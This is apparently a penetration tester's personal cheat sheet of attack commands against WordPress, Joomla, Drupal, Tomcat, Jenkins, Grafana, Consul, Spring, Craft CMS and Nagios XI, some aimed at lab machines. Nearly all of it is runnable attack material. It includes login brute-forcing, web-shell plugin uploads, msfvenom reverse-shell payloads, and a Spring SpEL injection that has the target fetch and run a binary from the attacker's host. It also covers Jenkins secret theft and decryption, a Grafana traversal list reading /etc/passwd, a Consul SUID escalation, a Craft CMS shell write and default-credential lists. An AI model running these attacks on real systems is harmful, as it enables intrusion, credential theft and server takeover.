/var/www/html/            # Apache	
/usr/local/nginx/html/    # Nginx	
c:\inetpub\wwwroot\       # IIS	
C:\xampp\htdocs\          # XAMPP

## ------------------| Basic
wpscan -e vt,tt,u,ap --url <URL>
wpscan -e vt,tt,u,ap -o wpscan.log --url <URL>

## ------------------| Plugin detection
wpscan -e ap --plugins-detection aggressive --url <URL>

## ------------------| Default Locations
/wp-content/plugins/akismet/index.php
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/twentytwentyone/404.php
/wp-content/themes/twentytwentytwo/404.php
/wp-content/plugins/revslider/public/index.php
/wp-content/plugins/contact-form-7/wp-contact-form-7.php

## ------------------| With WPScan
wpscan -U <UserName/List> -P <Password/List> --url <URL>

## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python2 wpforce.py -w <Password/List> -i <UserName/List> -u <URL>

## ------------------| With WpCrack
wget https://raw.githubusercontent.com/22XploiterCrew-Team/WpCrack/1.x/WpCrack.py          
python WpCrack.py -t <URL> --p <Password/List> -u <UserName>

select user_login,user_pass from wp_users;

## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python yertle.py -u "<username>" -p "<password>" -t "<URL>" -i

## Or

## ------------------| Create Plugin
wget https://raw.githubusercontent.com/leonjza/wordpress-shell/master/shell.php
zip -r shell.zip shell.php

## ------------------| Upload to
http://<IP>/wp-admin/plugin-install.php

## ------------------| Execute shell
http://<IP>/wp-content/plugins/shell/shell.php?cmd=id
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')"
 
## ------------------| Reverse shell (default port:443)
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>"})')"                        
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>","port":"4545"})')"

## ------------------| Identify version
# Navigate to 
/administrator/manifest/files/joomla.xml
# Check this tag
<version>3.7.5</version>

## ------------------| Run scan
joomscan -u <URL>

## ------------------| Affected Versions
Joomla! < 4.2.8

## ------------------| Manual Expo
curl 'http://<IP>/api/index.php/v1/config/application?public=true'

## ------------------| Automated
git clone https://github.com/ThatNotEasy/CVE-2023-23752 && cd CVE-2023-23752
pip3 install -r requirements.txt
python3 joomla.py

## ------------------| Username enumeration
### Check if we can register new user (search for "name is already taken")
/user/register

### Check access status 
/user/<number>
/user/1            
### is 403 --> user exist
### is 404 --> doesn't exist

## ------------------| Hidden pages
wfuzz -c -z range,1-500 --hc 404 http://<IP>/node/FUZZ

## ------------------| Check "plugin php" status
/modules/php
### if status is 403 --> "plugin php" exists/installed

## ------------------| Install "plugin php"
Modules --> Check for PHP "Filter" --> Save

## ------------------| Upload shell
Add content --> Basic Page/Article --> <paste_shell> --> select "PHP code in Text format" --> Preview

## ------------------| Endpoint permissions
/manager/html      # <--- roles="manager-gui" 
/manager/text/list # <--- roles="manager-script"  [If we have /manager, Then we can use curl to upload war file :)]  
/host-manager/html # <--- roles="admin-gui"

## ------------------| Path Normalization
/manager/notexsits/..;/html/
/manager/;name=notexsits/html/
/;name=notexsits/manager/        # <--- not work for upload war files
/notexsits/..;/manager/          # <--- not work for upload war files
## Remember to put '/' at the end ^

## ------------------| Common Creds
tomcat:s3cret
tomcat:s3cr3t
admin:s3cr3t
tomcat:tomcat
admin:admin
admin:tomcat
tomcat:Tomcatadm
tomcat:TomcatAdm
tomcat:Tomcatadn
admin:<NOTHING>

## ------------------| Upload paths
/manager/deploy?war=file&path=/shell    ## Tomcat6
/manager/text/deploy?path=/shell        ## Tomcat7 and above

## ------------------| Upload via curl
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war  
curl -u 'username:password' -T shell.war http://<IP>:8080/manager/text/deploy?path=/h4rithd      

## ------------------| Manually Upload  
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war  
## Then put the shell.war file to \tomcat\webapps\shell.war directory
## Then use \bin\startup.[sh/bat] file to restart the service and extract the war file.
## Now you can use http://<IP>/shell/

## ------------------| If code look like this
location /admin { 
    <--code-->
}

## ------------------| It has LFI; try this
admin../config.php

## ------------------| Important directories 
/_layouts/viewlsts.aspx

## ------------------| Setup
git clone https://github.com/byt3bl33d3r/SprayingToolkit      
cd SprayingToolkit/
pip3 install -r requirements.txt

## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txts
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt

## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01

/manage
/script
/credentials

## ------------------| Linux
/var/jenkins_home/config.xml
/var/jenkins_home/users/users.xml
/var/jenkins_home/credentials.xml
/var/jenkins_home/secrets/master.key 
/var/jenkins_home/users/admin_*/config.xml
/var/jenkins_home/secrets/hudson.util.Secret
/var/jenkins_home/secrets/initialAdminPassword
/var/lib/jenkins/config.xml
/var/lib/jenkins/users/users.xml
/var/lib/jenkins/credentials.xml
/var/lib/jenkins/secrets/master.key 
/var/lib/jenkins/users/admin_*/config.xml
/var/lib/jenkins/secrets/hudson.util.Secret
/var/lib/jenkins/secrets/initialAdminPassword

## ------------------| Windows
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\credentials.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\users.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\admin_*\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\master.key 
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret

## ------------------| Methord I (Reset Password)
## Edit following file
sudo vi /var/lib/jenkins/users/admin_5103638315737262589/config.xml
## Bcrypt password will store under <passwordHash> tag [here i used h4rithd]
<passwordHash>#jbcrypt:$2a$04$gcRUhfwsCQlQKbSTgpFCKOdV9uQuD5/vXwiU1bgULDzW4JB/pNp5S</passwordHash>
## Restart the service
sudo systemctl restart jenkins

## ------------------| Methord II (Decrypt Password using console)
## If you have access to /script then follow below url
## Get password hash from \users\<username>\config.xml
hudson.util.Secret.decrypt '<HASH>'

## ------------------| Methord III (Decrypt Password offline)
## Download following files
/var/jenkins_home/credentials.xml
/var/jenkins_home/secrets/master.key
/var/jenkins_home/secrets/hudson.util.Secret
## Get ssh keys
git clone https://github.com/hoto/jenkins-credentials-decryptor.git && cd jenkins-credentials-decryptor && make build
./bin/jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c credentials.xml -o text
## Get Password
pip install pycryptodome

## ------------------| Manual
wget http://<JENKINS_URL>/jnlpJars/jenkins-cli.jar
java -jar jenkins-cli.jar -s <JENKINS_URL> connect-node '@/etc/passwd'
java -jar jenkins-cli.jar -s <JENKINS_URL> reload-job '@/etc/passwd' 

## ------------------| Automate 
wget https://www.exploit-db.com/raw/51993 -O expo.py
python3 expo.py -u http://$IP:8080 -p /etc/passwd

## ------------------| 
/etc/grafana/grafana.ini
$WORKING_DIR/conf/defaults.ini
/usr/local/etc/grafana/grafana.ini

/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

echo 'chmod 4755 /bin/dash' > /dev/shm/test.sh
curl --header "X-Consul-Token: <TOKEN-********-****>" --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
dash -p

### Spring Boot version 2.6.5 
## ------------------| Manual
wget https://raw.githubusercontent.com/sunnyvale-it/CVE-2022-22965-PoC/main/exploit-core.py
python3 exploit-core.py --url http://10.10.11.204:8080/

## ------------------| Manual
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4545 -f elf > h4rithd.elf
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <IP>/h4rithd.elf -o /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'

## ------------------| Metasploit
use exploit/multi/http/spring_cloud_function_spel_injection

## ------------------| Versions between 4.0.0-RC1 – 4.4.14 
## Check for phpinfo
curl -sk "https://craftcms-vuln.ddev.site" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'          

## ------------------| RCE Path
## Create h4rithd.msl file 
<?xml version="1.0" encoding="UTF-8"?>
<image>
 <read filename="http://attacker_ip:8000/vuln.png" />
 <write filename="/var/www/html/web/shell.php" />
</image>

## ------------------| Create the vuln.png
exiftool -comment="<?php phpinfo(); ?>" vuln.png

## ------------------| Expolit
curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -H 'Content-Type: multipart/form-data' -F 'action=conditions/render' -F 'configObject[class]=craft\elements\conditions\ElementCondition' -F 'config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}' -F 'filename=@h4rithd.msl'
curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:/tmp/php*"}}}'
curl -k "http://surveillance.htb/shell.php" -x localhost:8080 --output -

## ------------------| Metasploit
use exploit exploit/multi/http/cmsms_object_injection_rce
set RHOSTS <IP>
set ForceExploit trueh4rith
exploit

## ------------------| Authenticate with API 
### Create token
curl -ksX POST https://<HOST>/nagiosxi/api/v1/authenticate -d 'username=<USER>&password=<PASS>&valid_min=500'
### Login to the server
https://<HOST>/nagiosxi/?token=<TOKEN>
### Add new user
curl -XPOST --insecure "https://<HOST>/nagiosxi/api/v1/system/user?apikey=<KEY>&pretty=1" -d "username=h4rithd&password=h4rithd&name=h4rithd&email=h4rithd@localhost&auth_level=admin"
### Login using hrithd:h4rithd creds

### Use SQL map to get admin api key
sqlmap -u "https://<HOST>/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=<AUTH_TOKEN>" --level 5 --risk 3 -p id --batch -D nagiosxi --dump -T xi_users